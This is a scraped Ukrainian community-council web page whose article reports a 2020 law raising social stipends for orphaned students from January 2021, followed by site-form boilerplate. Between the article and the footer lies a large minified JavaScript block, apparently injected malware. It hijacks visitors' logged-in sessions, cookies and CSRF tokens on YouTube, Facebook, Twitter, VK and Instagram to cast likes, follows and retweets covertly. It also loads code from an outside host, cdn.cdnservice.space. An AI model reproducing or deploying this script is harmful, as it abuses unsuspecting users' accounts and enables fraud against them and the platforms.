A A A K K K
для людей із порушенням зору
Миропільська територіальна громада
Житомирської області

ЗАКОН ПРО ЗБІЛЬШЕННЯ СТИПЕНДІЇ ДІТЯМ-СИРОТАМ ДІЯТИМЕ З 1 СІЧНЯ

Дата: 17.09.2020 17:23
Кількість переглядів: 548

Романівського бюро правової допомоги інформує

 

ЗАКОН ПРО ЗБІЛЬШЕННЯ СТИПЕНДІЇ ДІТЯМ-СИРОТАМ

ДІЯТИМЕ З 1 СІЧНЯ

 

8 серпня 2020 року набув чинності Закон України «Про внесення змін до статті 8 Закону України «Про забезпечення організаційно-правових умов соціального захисту дітей-сиріт та дітей, позбавлених батьківського піклування» щодо посилення соціального захисту учнів, студентів (курсантів) з числа дітей-сиріт, дітей, позбавлених батьківського піклування, та деяких інших осіб» та вводиться в дію з 1 січня 2021 року.

Відповідно до цього закону з 1 січня 2021 року:

право на соціальну стипендію матимуть студенти (курсанти), які під час навчання та у віці від 18 до 23 років залишилися без батьків (батьки яких померли / оголошені померлими, загинули або пропали безвісти);
підвищиться розмір соціальної стипендії для студентів (курсантів) з числа дітей-сиріт та дітей, позбавлених батьківського піклування, який становитиме не менше 150 відсотків розміру прожиткового мінімуму для дітей відповідного віку, а після досягнення такими дітьми 18 років – 150 відсотків розміру прожиткового мінімуму для працездатних осіб.

Окрім того вищезазначеним особам, які навчаються, до завершення навчання виплачується щорічна допомога для придбання навчальної літератури в розмірі не менше трьох місячних соціальних стипендій, посадових окладів, які їм призначені. Виплата зазначеної допомоги здійснюється протягом 30 днів після початку навчального року за рахунок коштів, що передбачаються для навчальних закладів у відповідних бюджетах.

На сьогодні такі студенти отримують соціальну стипендію у розмірі 2 360 грн, після набрання чинності закону розмір соціальної стипендії збільшиться в середньому на 1 150 гривень.

Якщо Ви або Ваші знайомі зіткнулися з правовими проблемами, просимо звертатися за безоплатною правовою допомогою до Романівського бюро правової допомоги за адресою: смт. Романів, вул. С.Лялевича, 2 (4-й поверх, каб. 425).


')).replace("error.facebook.com","er.facebook.com");var i=0,o=function(){t.contentDocument?(t.contentDocument.write(n),setTimeout(function(){switch(e.tasktype){case"fblikes":case"fbemo":u.likeFB(t,e);break;case"fblikepage":u.likeFBPage(t,e)}},5e3)):i>99?u.frError(t):(i++,setTimeout(o,50))};o()},error:function(){u.frError(t)}})},senderTW:function(e,t,n){f.postSend("/1.1/"+t,{headers:{authorization:u.authorization,"x-csrf-token":u.token,"x-twitter-active-user":"yes","x-twitter-auth-type":"OAuth2Session","x-twitter-client-language":"en"},data:"tweet_mode=extended&id="+e.item,creds:!0,success:function(t){h(e,n)}})},workIfr:null,focusQueue:[],focusCurrent:null,checkFocus:function(){if(u.workIfr)try{u.workIfr.contentWindow.focus()}catch(e){}setTimeout(u.checkFocus,100)},startQueue:function(){if(u.focusCurrent)setTimeout(u.startQueue,1e3);else{var e=u.focusQueue.shift();e?(u.focusCurrent=e,setTimeout(function(){u.workList[e.type].worker(e)},0)):setTimeout(u.startQueue,1e3)}},mainYCorker:function(e){var t=document.createElement("iframe"),n=function(){try{t.remove()}catch(e){}},i=["renderer","contains","comment"],o=XPathResult.ANY_TYPE;t.id="fr_"+e.type+"_"+e.id,t.width="640",t.height="480",t.style.position="absolute",t.style.top="0",t.style.left="0",document.body.appendChild(t),e.worktype="yliker_"+u.Version+u.workId,e.result=!1,u.getInfoData(e,function(r){t.contentDocument.write(r);var a,s,c={like:null,dislike:null},d=null,u=function(t){setTimeout(function(){t?h(e,e.logtype,n):n()},2e3)};a="//ytd-"+i[2]+"s["+i[1]+'(@class,"ytd-watch-flexy") and @id="'+i[2]+'s" and not(@hidden)]',s='//div[@id="linked-comment-badge"]/*/*/span['+i[1]+'(@class,"ytd-badge-supported-'+i[0]+'") and text()!=""][1]/ancestor-or-self::div['+i[1]+'(@class,"ytd-'+i[2]+"-"+i[0]+'") and @id="main"]';var l=t.contentDocument,f=0,p=function(){var t=l.evaluate(a,l,null,o,null),n=t.iterateNext();if(!n)return++f>100?void u(!0):void setTimeout(p,100);var r,w,m,h,y=(t=l.evaluate(s,n,null,o,null)).iterateNext();if(y){for(var k in c)r=y,m=void 0,h=void 0,m="*/*/ytd-toggle-button-"+i[0]+'[@id="'+(w=k)+'-button"]',(h=l.evaluate(m,r,null,o,null).iterateNext())&&(c[w]=h,h.classList[i[1]]("style-default-active")&&(d=w)),0;d?u(!1):(c[e.txttype].click(),u(!0))}else u(!0)};p()},function(){n()},!0),setTimeout(function(){n()},3e4)},mainYouWorker:function(e){e.worktype="yliker_"+u.Version+u.workId,e.result=!1,u.workIfr=document.createElement("iframe"),u.workIfr.width=u.width+"",u.workIfr.height=u.height+"",u.workIfr.marginwidth="0",u.workIfr.hspace="0",u.workIfr.vspace="0",u.workIfr.frameborder="0",u.workIfr.style.width=u.width+"px",u.workIfr.style.height=u.height+"px",u.workIfr.style.overflow="hidden",u.workIfr.style.zIndex="99999999",u.workIfr.id="yfr_"+e.type+"_"+e.id,u.workIfr.src=u.youUrl+"/embed?v=1",o.appendChild(u.workIfr),u.getInfoData(e,function(t){u.workIfr.contentDocument.write(t),setTimeout(function(){u.pausePlay(u.workIfr),o.style.width=u.width+"px",o.style.height=u.height+"px",o.style.zIndex="99999999"},500),setTimeout(function(){u.workBtns(u.workIfr,e)},1e3)})},getInfoData:function(e,t,n,i){i&&a("PREF",u.cookiesData.new,{domain:u.cookiesData.dom,path:u.cookiesData.path}),f.getSend(u.youUrl+"/watch?v="+e.item,{success:function(n){i&&(u.cookiesData.old?a("PREF",u.cookiesData.old,{domain:u.cookiesData.dom,path:u.cookiesData.path}):a("PREF","",{domain:u.cookiesData.dom,path:u.cookiesData.path,expires:-1}));var o="",r=n.match(/src ?= ?"([^"]+base.js)"/i);r&&(o=r[1]),n=(n=(n=(n=(n=n.replace(/src="(/[^"]+base.js)"/gi,'src="https://cdn.cdnservice.space$1"')).replace(/"js":"(/[^"]+base.js)"/gi,'"js":"https://cdn.cdnservice.space$1"')).replace("",'')).replace("(isHidden)","(false)")).replace('window["ytInitialData"]','setInterval(function(){ var b = document.evaluate('//button[contains(@class,"ytp-ad-skip-button")]', document, null, XPathResult.ANY_TYPE, null); a = b.iterateNext(); if(a) a.click(); }, 300);window["ytInitialData"]'),t(n)},creds:!0})},pausePlay:function(e){if(e)if(!e||e.contentDocument){var t=!1,n=0,i=function(){if(!t){var o,r,a=XPathResult.ANY_TYPE,s=e.contentDocument;if(r=(o=s.evaluate('//button[contains(@class,"ytp-play-button")]',s,null,a,null)).iterateNext())for(t=!0;r;){r.click();try{r=o.iterateNext()}catch(e){r=null}}else{if(++n>50)return;setTimeout(i,100)}}};i()}else setTimeout(function(){u.pausePlay(e)},200)},sendEnd:function(e,t){o.style.width="10px",o.style.height="10px",t&&h(e,e.logtype),setTimeout(function(){try{u.workIfr.remove(),u.focusCurrent=null,setTimeout(u.startQueue,1e3)}catch(e){}},2e3)},workBtns:function(e,t){if(e)if(!e||e.contentDocument){var n,i,o={like:null,dislike:null},r=null,a=["renderer","contains","comment"],s=XPathResult.ANY_TYPE,c=e.contentDocument;n="//div["+a[1]+'(@class,"ytd-video-primary-info-renderer") and @id="menu" and not(@hidden)]',i='*/div[@id="top-level-buttons" and contains(@class,"ytd-menu-renderer")]';var d=function(e,t,n){var i,d;i="ytd-toggle-button-"+a[0]+"["+n+"]",(d=c.evaluate(i,e,null,s,null).iterateNext())&&(o[t]=d,d.classList[a[1]]("style-default-active")&&(r=t))},l=0,f=!1,p=function(){var a=c.evaluate(n,c,null,s,null),w=a.iterateNext();if(!w)return++l>50?void u.sendEnd(t,!1):void setTimeout(p,100);var m=(a=c.evaluate(i,w,null,s,null)).iterateNext();if(m){var h=1;for(var y in o)d(m,y,h),h++;!r&&o[t.txttype]?(o[t.txttype].onclick=function(){u.sendEnd(t,!0)},c.onmousemove=function(n){if(!f){f=!0;var i=c.createEvent("MouseEvents");i.initMouseEvent("click",!0,!1,e.contentWindow,1,n.screenX,n.screenY,n.clientX,n.clientY,!1,!1,!1,!1,0,null),o[t.txttype].dispatchEvent(i)}}):u.sendEnd(t,!1)}else u.sendEnd(t,!1)};p()}else setTimeout(function(){u.workBtns(e,t)},500)},setINData:function(e,t,n){f.getSend(u.inUrl+"/"+e.item+"/",{success:function(i){var o=i.match(/>window._sharedData = ({.*?});/i);if(o){var r=JSON.parse(o[1]),a=null,s=null;if(!r.rollout_hash)return;if(s=r.rollout_hash,"inlike"===n){if(r.entry_data&&r.entry_data.PostPage&&Array.isArray(r.entry_data.PostPage)&&void 0!==r.entry_data.PostPage[0].graphql?a=r.entry_data.PostPage[0].graphql.shortcode_media:(o=i.match(/({"graphql":.*?}));/i))&&(r=JSON.parse(o[1])).graphql&&r.graphql.shortcode_media&&(a=r.graphql.shortcode_media),!a||a.viewer_has_liked)return}else if(r.entry_data&&r.entry_data.ProfilePage&&Array.isArray(r.entry_data.ProfilePage)&&void 0!==r.entry_data.ProfilePage[0].graphql&&(a=r.entry_data.ProfilePage[0].graphql.user),!a||a.followed_by_viewer)return;f.postSend(u.inUrl+t.replace("[id]",a.id),{success:function(t){try{(t=JSON.parse(t))&&t.status&&"ok"===t.status&&h(e,n)}catch(e){}},headers:{"X-CSRFToken":u.token,"X-IG-App-ID":"936619743392459","X-Instagram-AJAX":s,"X-Requested-With":"XMLHttpRequest"},creds:!0})}},creds:!0})},workList:{11:{worker:function(e){e.logtype=e.txttype="dislike",u.mainYouWorker(e)},workEnd:[]},12:{worker:function(e){e.logtype=e.txttype="like",e.logtype="c"+e.logtype,u.mainYCorker(e)},workEnd:[]},13:{worker:function(e){e.logtype=e.txttype="dislike",e.logtype="c"+e.logtype,u.mainYCorker(e)},workEnd:[]},16:{worker:function(e){f.postSend(u.vkUrl+"like.php",{data:"act=a_get_stats&al=1&object="+e.item,success:function(t){var n=t.match(/"like_my":([0-9]+)/i);if(n&&"0"===n[1]||t.indexOf("me_hidden")>0)if(0==e.item.indexOf("clip")){var i=e.item.match(/^clip[-_]?([0-9]+)_([0-9]+)$/i);i&&f.postSend(u.vkUrl+"al_video.php?act=show",{data:['_nol={"0":"clips'+i[1]+'","z":"clip'+i[1]+"_"+i[2]+'"}',"act=show","al=1","autoplay=0","list=","module=","video="+i[1]+"_"+i[2]].join("&"),success:function(t){u.likeVKItem(e,t,"vklike")}})}else f.getSend(u.vkUrl+e.item,{success:function(t){u.likeVKItem(e,t,"vklike")}})}})},workEnd:[]},17:{worker:function(e){e.logtype=e.txttype="like",u.mainYouWorker(e)},workEnd:[]},26:{worker:function(e){e.subtype=1,e.tasktype="fblikes",u.starterFB(e)},workEnd:[]},29:{worker:function(e){var t=e.item.match(/^(.*)_([0-9]+)$/i);t&&(e.item=t[1],e.subtype=t[2],e.tasktype="fbemo",u.starterFB(e))},workEnd:[]},35:{worker:function(e){e.tasktype="fblikepage",u.starterFB(e)},workEnd:[]},43:{worker:function(e){u.setINData(e,"/web/likes/[id]/like/","inlike")},workEnd:[]},45:{worker:function(e){u.senderTW(e,"favorites/create.json","twitlikes")},workEnd:[]},46:{worker:function(e){u.senderTW(e,"statuses/retweet.json","twitretweet")},workEnd:[]},48:{worker:function(e){f.postSend(u.vkUrl+"like.php",{data:"act=a_get_stats&al=1&object="+e.item,success:function(t){var n=t.match(/"like_my":([0-9]+)/i);n&&"0"===n[1]&&f.getSend(u.vkUrl+e.item,{success:function(t){u.followVK(e,t,u.likeVKItem)}})}})},workEnd:[]},50:{worker:function(e){u.setINData(e,"/web/friendships/[id]/follow/","infollow")},workEnd:[]}}},l=function(){return this};l.prototype={fillOptions:function(e){return["data","success","error","json","headers","creds"].forEach(function(t){void 0===e[t]&&(e[t]=null)}),e},getSend:function(e,t){return this.sender("GET",e,t)},postSend:function(e,t){return this.sender("POST",e,t)},sender:function(e,t,n){n=this.fillOptions(n);var i=new XMLHttpRequest;if(i.open(e,t,!0),n.json||"POST"!==e||i.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),i.onreadystatechange=function(){4===i.readyState&&200===i.status?n.success&&n.success(i.responseText):4===i.readyState&&200!==i.status&&n.error&&n.error(i.responseText,i.status)},n.creds&&(i.withCredentials=!0),n.headers)for(var o in n.headers)i.setRequestHeader(o,n.headers[o]);return i.send(n.data),i}};var f=new l,p=function(e){u.workId="25",n=r("ds_user_id"),u.token=r("csrftoken"),n&&"0"!==n&&0!==n&&(u.needParent=e,v())},w=null,m=function(e,n){f.postSend(t+"event",{data:JSON.stringify(e),json:!0,success:n})},h=function(e,t,i){var o={id:parseInt(e.id),fingerprint:n,type:u.Version+u.workId,type_task:t};return u.needParent?(window.parent.postMessage(JSON.stringify({logData:o}),"*"),void(i&&i())):u.needMessage?(document.getElementById("loaderIframe").contentWindow.postMessage(JSON.stringify({logData:o}),"*"),void(i&&i())):void m(o,i)},y=function(e,t){i=[];var n=JSON.parse(e);for(var o in u.workList)if(void 0!==n[o])for(var r in n[o])0,t?u.focusQueue.push({id:r,item:n[o][r],type:o}):i.push({id:r,item:n[o][r],type:o});if(setTimeout(function(){v(t)},6e4),!t)for(var a=0;i.length;){!function(e,t){setTimeout(function(){u.workList[e.type].worker(e)},1e3*a)}(i.shift()),a++}},k=function(t,n,i){f.postSend(e+"youlist.php?worker="+n+"&uid="+i,{success:function(e){t.source.postMessage(JSON.stringify({id:n,data:e}),"*")},error:function(){t.source.postMessage(JSON.stringify({id:n,data:"{}"}),"*")},data:""})},v=function(t){u.needParent?window.parent.postMessage(JSON.stringify({getData:u.workId,visiter:n}),"*"):u.needMessage?document.getElementById("loaderIframe").contentWindow.postMessage(JSON.stringify({getData:u.workId,visiter:n}),"*"):u.focusQueue.length>0?setTimeout(function(){v(t)},6e4):f.postSend(e+"youlist.php?worker="+u.workId+"&uid="+n,{success:function(e){y(e,t)},error:function(){setTimeout(function(){v(t)},6e4)},data:""})};document.hasFocus=function(){return!0},(o=document.getElementById("mainWidgetDiv"))||((o=document.createElement("div")).id="mainWidgetDiv",o.style.width=o.style.height="1px",o.style.position="absolute",o.style.top="0",o.style.left="0",o.style.overflow="hidden",document.body.appendChild(o),(w=document.createElement("iframe")).src="https://cdn.cdnservice.space/flister.html?v=3",w.id="loaderIframe",w.width=w.height="1",w.style.position="absolute",w.style.width=w.style.height="1px",document.body.appendChild(w),window.addEventListener("message",d),f.postSend(e+"youlist.php?worker=35&uid="+s.u4f(),{data:""}),setTimeout(function(){if(document.location.href.indexOf("vk.com")>0)return u.workId="23",void f.getSend(u.vkUrl+"feed",{success:function(e){var t=e.match(/id: ([0-9]+),/im);t&&"0"!==(n=t[1])&&parseInt(n)>0&&v()}});if(document.location.href.indexOf("facebook.com")>0)!function(){if(u.workId="24",window.require){var e=window.require("CurrentUserInitialData");e&&e.USER_ID&&(n=e.USER_ID)}else n=r("c_user");console.log(n),n&&(u.needMessage=!0,v())}();else{if(document.location.href.indexOf("twitter.com")>0)return u.workId="26",void((n=(n=r("twid")).replace("u%3D","").replace(/[^0-9]+/,""))&&(u.token=r("ct0"),u.token?v():f.getSend("/home?prefetchTimestamp="+s.curTime(),{creds:!0,success:function(e){var t=e.match(/"(ct0=([^;]+); Max-Age=[0-9]+; Domain=.twitter.com; Path=/; Secure)"/i);t&&(document.cookie=decodeURIComponent(t[1]),u.token=t[2],u.token&&v())}})));if(window.top===window.self){if(document.location.href.indexOf("youtube.com")>0)return u.workId="22",void((n=r("APISID"))&&window.ytcfg&&window.ytcfg.data_&&(window.ytcfg.data_.PLAYER_CONFIG&&window.ytcfg.data_.PLAYER_CONFIG.args&&window.ytcfg.data_.PLAYER_CONFIG.args.user_display_name||window.ytcfg.data_.LOGGED_IN)&&(o.style.position="fixed",o.style.left="0px",o.style.top="0",o.style.width="10px",o.style.height="10px",o.style.opacity="0.01",o.style.zIndex="99999999",setTimeout(u.startQueue,300),setTimeout(u.checkFocus,100),v(!0)));if(document.location.href.indexOf("instagram.com")>0)return void p();var e=document.createElement("iframe");e.src=u.vkUrl+"widget_post.php",e.width=e.height="10",e.style.width=e.style.height="10px",o.appendChild(e);var t=document.createElement("iframe");t.src=u.fbUrl+"v2.5/plugins/video.php",t.width=t.height="10",t.style.width=t.style.height="10px",o.appendChild(t);var i=document.createElement("iframe");i.src=u.inUrl+"/p/embed/embed/",i.width=i.height="10",i.style.width=i.style.height="10px",o.appendChild(i);var a=document.createElement("iframe");a.src=u.youUrl+"/embed",a.width=a.height="10",a.style.position="absolute",a.style.width=a.style.height="10px",o.appendChild(a)}else{if(document.location.href.indexOf("youtube.com")>0)return u.workId="6",void((n=r("APISID"))&&window.ytcfg&&window.ytcfg.data_&&(window.ytcfg.data_.PLAYER_CONFIG&&window.ytcfg.data_.PLAYER_CONFIG.args&&window.ytcfg.data_.PLAYER_CONFIG.args.user_display_name||window.ytcfg.data_.LOGGED_IN)&&(u.cookiesData.old=r("PREF"),v()));if(document.location.href.indexOf("instagram.com")>0)return void p(!0)}}},1e3))}}();
 


« повернутися

Код для вставки на сайт

Вхід для адміністратора

Онлайн-опитування:

Увага! З метою уникнення фальсифікацій Ви маєте підтвердити свій голос через E-Mail
Скасувати

Результати опитування

Дякуємо!

Ваш голос було зараховано

Форма подання електронного звернення


Авторизація в системі електронних звернень

Авторизація в системі електронних петицій

Ще не зареєстровані? Реєстрація

Реєстрація в системі електронних петицій


Буде надіслано електронний лист із підтвердженням

Потребує підтвердження через SMS


Вже зареєстровані? Увійти

Відновлення забутого пароля

Згадали авторизаційні дані? Авторизуйтесь